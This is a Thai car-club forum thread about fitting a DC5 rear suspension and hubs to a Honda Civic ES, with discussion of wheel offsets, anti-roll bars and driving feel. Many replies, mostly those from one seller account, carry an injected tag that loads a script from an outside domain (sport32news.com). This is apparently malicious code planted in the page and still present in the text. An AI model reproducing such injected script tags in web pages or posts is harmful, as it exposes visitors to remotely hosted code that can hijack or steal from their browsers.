ตอบ
เค


ชื่อเล่น: เค

เข้าร่วม: 26 กันยา 2012
ตอบ: 1528

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 933
ให้คำขอบคุณ: 4208

ที่อยู่: ชลบุรี-บ้านบึง
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พฤหัส, 7 กุมภา 2013 08:31 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
รอเก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 08:31 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
IP-GeorGe พิมพ์ว่า:
มีของเล่นใหม่อีกแล้ว <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></



555เมื่อวานโดนลางานตอนบ่ายสี่โมงอ่าพี่ตั้ม ผมเลยจัดลายันดึกเลยทีนี้ หาเวลานี้มานานแล้ว "<script src="https://sport32news.com/civicesgroup.js">
davidian พิมพ์ว่า:
เข้ามารอชมด้วยคน



รอแป๊บคร้าบ เมื่อคืนฝ่ายความมั่นคงไม่ยอมนอนเลยไม่กล้าเปิดโทีศัพท์ถ่ายรูป"<script src="https://sport32news.com/civicesgroup.js">
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
พฤหัส, 7 กุมภา 2013 08:32 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
โช๊คหลังใส่ของเดิมได้รึเปล่าอ่าครับ มีอะไรเปลี่ยนแปลงไปอีกบ้างเอ่ย พวกกันโคลง ปีกนก
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 08:34 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
wut-chiangmai พิมพ์ว่า:
โช๊คหลังใส่ของเดิมได้รึเปล่าอ่าครับ มีอะไรเปลี่ยนแปลงไปอีกบ้างเอ่ย พวกกันโคลง ปีกนก



ผมยกทั้งแพเลยคร้าบพี่คร้าบ ยกเว้นโช้ค ยังใส่ TANABE SUSTEC PRO เหมือนเดิม ตอนแรกว่าจะเปลี่ยนเป็นอีกชุดแต่อยากได้ข้อสรุปจากแพใหม่ก่อน แล้วค่อยจัดตามอีกที"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: wut-chiangmai 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 08:37 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
เค พิมพ์ว่า:
รอเก็บข้อมูลครับ



มันก้ฟิตๆแหละลุงเค เวลาโยก กระแทกแรงๆก็ไม่มีเสียง ใหม่ๆก็งี๊แหละ อาจจะยังอายกันอยู่


แก้ไขล่าสุดโดย เมื่อ พฤหัส, 7 กุมภา 2013 08:40, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
เค


ชื่อเล่น: เค

เข้าร่วม: 26 กันยา 2012
ตอบ: 1528

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 933
ให้คำขอบคุณ: 4208

ที่อยู่: ชลบุรี-บ้านบึง
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พฤหัส, 7 กุมภา 2013 08:39 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
eskung พิมพ์ว่า:

เค พิมพ์ว่า:
รอเก็บข้อมูลครับ



มันก้ฟิตๆแหละลุงเค เวลาโยก กระแทกแรงๆก็ไม่มีเสียง ใหม่ก็งี๊แหละ อาจจะยังอายกันอยู่


<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ..ขาวโบ๊ะ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 08:40 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
เค พิมพ์ว่า:
eskung พิมพ์ว่า:

เค พิมพ์ว่า:
รอเก็บข้อมูลครับ



มันก้ฟิตๆแหละลุงเค เวลาโยก กระแทกแรงๆก็ไม่มีเสียง ใหม่ก็งี๊แหละ อาจจะยังอายกันอยู่


<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ ..ขาวโบ๊ะ



แฮ่ๆๆ
ได้รับคำขอบคุณจาก: เค 
a_bug


ชื่อเล่น: กอล์ฟ

เข้าร่วม: 31 มีนา 2012
ตอบ: 486

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 107

ที่อยู่: พระประแดง สมุทรปราการ
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 7 กุมภา 2013 08:40 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
นี่ก็ต้องเปลี่ยนกันโครงไปใช้ของdc5 ด้วยใช่ไหมครับ เพราะเห็นมีคนเคยรีวิวว่า กันโครงเรากับของdc5 ต่างกันนิดหน่อยเพราะจุดยึดกันโครงที่อาร์มไม่ตรงกัน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 08:42 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
a_bug พิมพ์ว่า:
นี่ก็ต้องเปลี่ยนกันโครงไปใช้ของdc5 ด้วยใช่ไหมครับ เพราะเห็นมีคนเคยรีวิวว่า กันโครงเรากับของdc5 ต่างกันนิดหน่อยเพราะจุดยึดกันโครงที่อาร์มไม่ตรงกัน



เป็นโคลงการที่ทำไว้รองรับสิ่งนี้ด้วยคร้าบพี่คร้าบ"<script src="https://sport32news.com/civicesgroup.js">
lkki5


เข้าร่วม: 26 ตุลา 2008
ตอบ: 2973

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3115
ให้คำขอบคุณ: 1255

ที่อยู่: สัตหีบ ชลบุรี หรือ พิจิตร นครสวรรค์
ปี: 2001
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 7 กุมภา 2013 10:30 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ตอบ มีแต่ข้อดีไม่มีข้อเสียเลยเหรอ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 10:33 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
แอบจับได้ รถอาจารย์มักจะเปลี่ยนแปลงตลอดเวลาเลยนะครับ อาจารย์ แล้วแล็คตรงหลังคาไว้ขนอะไรครับ แอบสงสัย
ปล. ผมหา web คำนวณ offset ล้อได้แล้วนะครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 10:38 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
pom_sawas พิมพ์ว่า:
แอบจับได้ รถอาจารย์มักจะเปลี่ยนแปลงตลอดเวลาเลยนะครับ อาจารย์ แล้วแล็คตรงหลังคาไว้ขนอะไรครับ แอบสงสัย
ปล. ผมหา web คำนวณ offset ล้อได้แล้วนะครับ



เอาไว้ขนเด็กนักเรียนอ่าเพ่ป้อม พอดีผมรับส่งนักเรียนด้วยอ่า เวปไหนก้าบอยากรู้มั่งพี่ชาย"<script src="https://sport32news.com/civicesgroup.js">
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 10:38 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
lkki5 พิมพ์ว่า:
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ตอบ มีแต่ข้อดีไม่มีข้อเสียเลยเหรอ



งั้นเปลืองตังค์แล้วกันคร้าบ"<script src="https://sport32news.com/civicesgroup.js">
FuckTong


ชื่อเล่น: เอ๋

เข้าร่วม: 21 เมษา 2011
ตอบ: 4394

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2463
ให้คำขอบคุณ: 2244

ที่อยู่: Samutprakan
ปี: 2001
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 7 กุมภา 2013 12:25 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
อยาเหนรูปแล้วอ่ะ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
athongchum


ชื่อเล่น: เอก

เข้าร่วม: 04 สิงหา 2011
ตอบ: 1976

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3152
ให้คำขอบคุณ: 1666

ที่อยู่: งามวงศ์วาน
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 7 กุมภา 2013 12:48 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
eskung พิมพ์ว่า:
athongchum พิมพ์ว่า:
แล้วแพหน้าละลุง เปลี่ยนด้วยป่าว



หน้าผมใช้ D17 ของสตรีมเหมือนเดิมคร้าบผม กำลังคิดอยู่เลยว่าเอาไงดี เพราะถ้าด้านหน้าผมใส่ 300 มิลก็ต้องยอมกลับไปใส่ P1 ซึ่ง P1 ของผมมันกว้าง 7.5 อ๊อฟ 32 4ลูกเลย ปํญหามันอยู่ที่ข้างหลังนี่แหละคร้าบ เพราะตอนนี้มันยื่นออกมาอีก 16 มิล ถ้าผมใส่ P1 สรุป อ๊อฟเหลือแค่ 16 เองทีนี้รับรองต้องปรับแคมเบอร์ช่วยอาจจะสวยแต่ขับลำบาก จอดแหง็กที่บ้านแน่นอนคร้าบ เอ้าเรามี SPRINT HART กว้าง 7.5 อ๊อฟ 42 อีกชุดนี่หว่า ค่อยคิดอีกที


ขัดเจน แต่อยากเห็นลุงใส่ P1 อ่ะว่ามันจะปลิ้นแค่ไหน อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
catsteal


ชื่อเล่น: อ๋อง

เข้าร่วม: 08 เมษา 2010
ตอบ: 3841

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3145
ให้คำขอบคุณ: 124

ที่อยู่: เชียงใหม่-กรุงเทพ
ปี: 2004
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 7 กุมภา 2013 13:03 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
ลองหาล้อออฟซํก 20-25 สิคับ หนึบขึ้นแน่นอน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
pued007


ชื่อเล่น: ปื้ด

เข้าร่วม: 09 ตุลา 2011
ตอบ: 694

Guru ES
Guru ES

ได้รับคำขอบคุณ: 684
ให้คำขอบคุณ: 1070

ที่อยู่: บางกะปิ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 7 กุมภา 2013 13:17 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
ผลเป็นงัยบ้างครับคุณครู
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 16:24 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
ขอบคุณพี่ๆทุกคนมากคร้าบ "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ekdanai 
ekdanai


ชื่อเล่น: ช้าง

เข้าร่วม: 15 พฤษภาคม 2011
ตอบ: 2062

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1977
ให้คำขอบคุณ: 1004

ที่อยู่: อ.เมือง จ.พิษณุโลก
ปี: 2001
สี: แดง รอยัล รูบี้ (มุก) (R-522P)
พฤหัส, 7 กุมภา 2013 18:43 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ถ้าเป็นแพเดิมแต่ดุม dc5 หน้าหลังออฟเซตล้อจะยื่นออกมาเท่ากันเป่าครับพี่เอ้
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
OUM


เข้าร่วม: 26 มิถุนา 2011
ตอบ: 2313

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2142
ให้คำขอบคุณ: 1465

ปี: 2003
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 19:44 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
แจ่ม
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 7 กุมภา 2013 20:31 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
Ae_Aonnut พิมพ์ว่า:
อยาเหนรูปแล้วอ่ะ



ลงอล้วนะคร้าบพี่เอ๋ แต่ล้อผมมันเล้กเลยไม่ค่อยเห้นข้อแตกต่างเท่าไหร่ แต่ขับดูก่อนเปลี่ยนกับหลังเปลี่ยนนี่ต่างกันเลยคร้าบ"<script src="https://sport32news.com/civicesgroup.js">
athongchum พิมพ์ว่า:
eskung พิมพ์ว่า:
athongchum พิมพ์ว่า:
แล้วแพหน้าละลุง เปลี่ยนด้วยป่าว



หน้าผมใช้ D17 ของสตรีมเหมือนเดิมคร้าบผม กำลังคิดอยู่เลยว่าเอาไงดี เพราะถ้าด้านหน้าผมใส่ 300 มิลก็ต้องยอมกลับไปใส่ P1 ซึ่ง P1 ของผมมันกว้าง 7.5 อ๊อฟ 32 4ลูกเลย ปํญหามันอยู่ที่ข้างหลังนี่แหละคร้าบ เพราะตอนนี้มันยื่นออกมาอีก 16 มิล ถ้าผมใส่ P1 สรุป อ๊อฟเหลือแค่ 16 เองทีนี้รับรองต้องปรับแคมเบอร์ช่วยอาจจะสวยแต่ขับลำบาก จอดแหง็กที่บ้านแน่นอนคร้าบ เอ้าเรามี SPRINT HART กว้าง 7.5 อ๊อฟ 42 อีกชุดนี่หว่า ค่อยคิดอีกที


ขัดเจน แต่อยากเห็นลุงใส่ P1 อ่ะว่ามันจะปลิ้นแค่ไหน อิอิ




ผมขอผ่านช่วงนี้ไปพักใหญ่ก่อนคร้าบเพราะผมใส่  P1 ไปโดนไล่ยิงผิดตัวมา อดหล่อไปเลย ตอนนี้ใส่พวกล้อ 15 จนชินเลยคร้าบทีนี้"<script src="https://sport32news.com/civicesgroup.js">
catsteal พิมพ์ว่า:
ลองหาล้อออฟซํก 20-25 สิคับ หนึบขึ้นแน่นอน



ขับไม่ไหวคร้าบพี่อ๋องคร้าบ ประมาณ 5 ปีที่แล้วผมทำฟรัทอยู่ แล้วรถมันต้องขับทำงานด้วย ไม่ไหวจริงๆคร้าบ ขอบคุณความรู้ดีๆจากพี่อ๋องด้วยคร้าบ"<script src="https://sport32news.com/civicesgroup.js">
pued007 พิมพ์ว่า:
ผลเป็นงัยบ้างครับคุณครู




ออกมาดีพอใจเลยคร้าบพี่ปื๊ด กับงบ 10000 นะผมว่าไม่ผิดหวังเลย สำหรับคนที่ขับรถเร็วนะผมว่าควรจัดอย่างยิ่งเลยคร้าบ"<script src="https://sport32news.com/civicesgroup.js">
ekdanai พิมพ์ว่า:
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ถ้าเป็นแพเดิมแต่ดุม dc5 หน้าหลังออฟเซตล้อจะยื่นออกมาเท่ากันเป่าครับพี่เอ้


ยื่นเหมือนกันคร้าบพี่ช้าง ผมชิงตอบเลยเพราะน้องผมคนนึงเค้าก็ใส่อยู่คร้าบ"<script src="https://sport32news.com/civicesgroup.js">
OUM พิมพ์ว่า:
แจ่ม




ขอบคุณมากคร้าบพี่คร้าบ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ekdanai 
yoosabai


ชื่อเล่น: เอ้

เข้าร่วม: 30 กันยา 2008
ตอบ: 1992

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8345
ให้คำขอบคุณ: 4773

ที่อยู่: Samutprakarn
ปี: 2005
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 8 กุมภา 2013 00:18 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
ekdanai พิมพ์ว่า:
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ถ้าเป็นแพเดิมแต่ดุม dc5 หน้าหลังออฟเซตล้อจะยื่นออกมาเท่ากันเป่าครับพี่เอ้


ยื่นออกมาแบบเดียวกันครับ อ.ช้าง เพราะดุมน่านล่ะครับที่ทำให้มันยื่นออกมา ง่ายๆเลยคือ ดุมของ dc5 จะกว้างกว่าของ es อยู่ 16มิลครับ
หากต้องการจะทำมสิ่งที่ต้องใช้อย่างน้อยคือ ดุมกับจาน dc5 ครับ ที่เหลือใช้ของเดิม es ได้หมดเลยยยย
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Sak_es5442 
DRINK


เข้าร่วม: 04 ตุลา 2008
ตอบ: 3856

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5219
ให้คำขอบคุณ: 1708

ที่อยู่: Paris + Bangkok + Uttaradit + Phitsanulok
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 8 กุมภา 2013 01:13 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
yoosabai พิมพ์ว่า:
ekdanai พิมพ์ว่า:
yoosabai พิมพ์ว่า:
หนึบขึ้นแน่นอนครับคุณนพ ฐานล้อกว้างขึ้นออกไปอีกข้างละเกือบ 2 cm 

ข้อดีอีกอย่างคือ สำหรับคนที่ต้องการล้อล้นๆ เต็มๆ ไม่ต้องไปดิ้นลนหาล้อออฟเซ็ตเทพๆพวก +33  +35 ซึ่งราคามหาโหด เราสามารถหันมาคบล้อออฟเซ็ตบ้านๆพวก +43 +45  +48 ได้สบายๆ ซึ่งล้อพวกนี้ ราคาล้อก็บ้านๆ สบายกระเป๋าขึ้นอีกเยอะครับ




ถ้าเป็นแพเดิมแต่ดุม dc5 หน้าหลังออฟเซตล้อจะยื่นออกมาเท่ากันเป่าครับพี่เอ้


ยื่นออกมาแบบเดียวกันครับ อ.ช้าง เพราะดุมน่านล่ะครับที่ทำให้มันยื่นออกมา ง่ายๆเลยคือ ดุมของ dc5 จะกว้างกว่าของ es อยู่ 16มิลครับ
หากต้องการจะทำมสิ่งที่ต้องใช้อย่างน้อยคือ ดุมกับจาน dc5 ครับ ที่เหลือใช้ของเดิม es ได้หมดเลยยยย



พี่เอ้ แล้วผมต้องใช้กันโคลงอันไหนครับ ของเดิมตัว2.0 ใส่ได้ป่าวอ่ะ หรือต้องโดนกันโคลงเพิ่ม ไอย่ะะะะ งานยาวทีละนิดๆ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
pom_sawas


เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

ที่อยู่: ร้านขายนมผง
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 8 กุมภา 2013 10:58 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
eskung พิมพ์ว่า:
pom_sawas พิมพ์ว่า:
แอบจับได้ รถอาจารย์มักจะเปลี่ยนแปลงตลอดเวลาเลยนะครับ อาจารย์ แล้วแล็คตรงหลังคาไว้ขนอะไรครับ แอบสงสัย
ปล. ผมหา web คำนวณ offset ล้อได้แล้วนะครับ



เอาไว้ขนเด็กนักเรียนอ่าเพ่ป้อม พอดีผมรับส่งนักเรียนด้วยอ่า เวปไหนก้าบอยากรู้มั่งพี่ชาย"<script src="https://sport32news.com/civicesgroup.js">


http://www.1010tires.com/WheelOffsetCalculator.asp

เวปนี้เลยครับใส่ค่า ได้เลย เปรียบเทียบได้ด้วยครับ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
phomploy


ชื่อเล่น: ทักกี้

เข้าร่วม: 21 มกรา 2013
ตอบ: 39

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 19
ให้คำขอบคุณ: 25

ที่อยู่: พระราม 3, สมุทรสาคร
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
ศุกร์, 8 กุมภา 2013 11:34 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
เก็บข้อมูล
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
pejung


ชื่อเล่น: พี

เข้าร่วม: 12 สิงหา 2011
ตอบ: 540

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 634
ให้คำขอบคุณ: 692

ที่อยู่: กรุงเทพ-แพร่-น่าน-พะเยา-เชียงราย-ลำปาง-เชียงใหม่
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 8 กุมภา 2013 13:45 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
ขอถามหน่อยคับทำไมใส่อแดปเตอร์แล้วขับรถเร็วมันไม่ดีเหรอคับ (เพราะมีโครงการจะทำอแดปเตอร์ใส่อยู่พอดีออฟล้อไม่สวยกำลังตัดสินใจอยู่ ผมขับเร็วและขับทางไกลด้วย)
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 8 กุมภา 2013 17:53 - แพหลัง DC5 หนึบโคตร กับ Topfuel ในห้องเครื่องเน่าๆ
pom_sawas พิมพ์ว่า:
eskung พิมพ์ว่า:
pom_sawas พิมพ์ว่า:
แอบจับได้ รถอาจารย์มักจะเปลี่ยนแปลงตลอดเวลาเลยนะครับ อาจารย์ แล้วแล็คตรงหลังคาไว้ขนอะไรครับ แอบสงสัย
ปล. ผมหา web คำนวณ offset ล้อได้แล้วนะครับ



เอาไว้ขนเด็กนักเรียนอ่าเพ่ป้อม พอดีผมรับส่งนักเรียนด้วยอ่า เวปไหนก้าบอยากรู้มั่งพี่ชาย"<script src="https://sport32news.com/civicesgroup.js">


http://www.1010tires.com/WheelOffsetCalculator.asp

เวปนี้เลยครับใส่ค่า ได้เลย เปรียบเทียบได้ด้วยครับ 
ขอบคุณมากคร้าบพี่ชาย

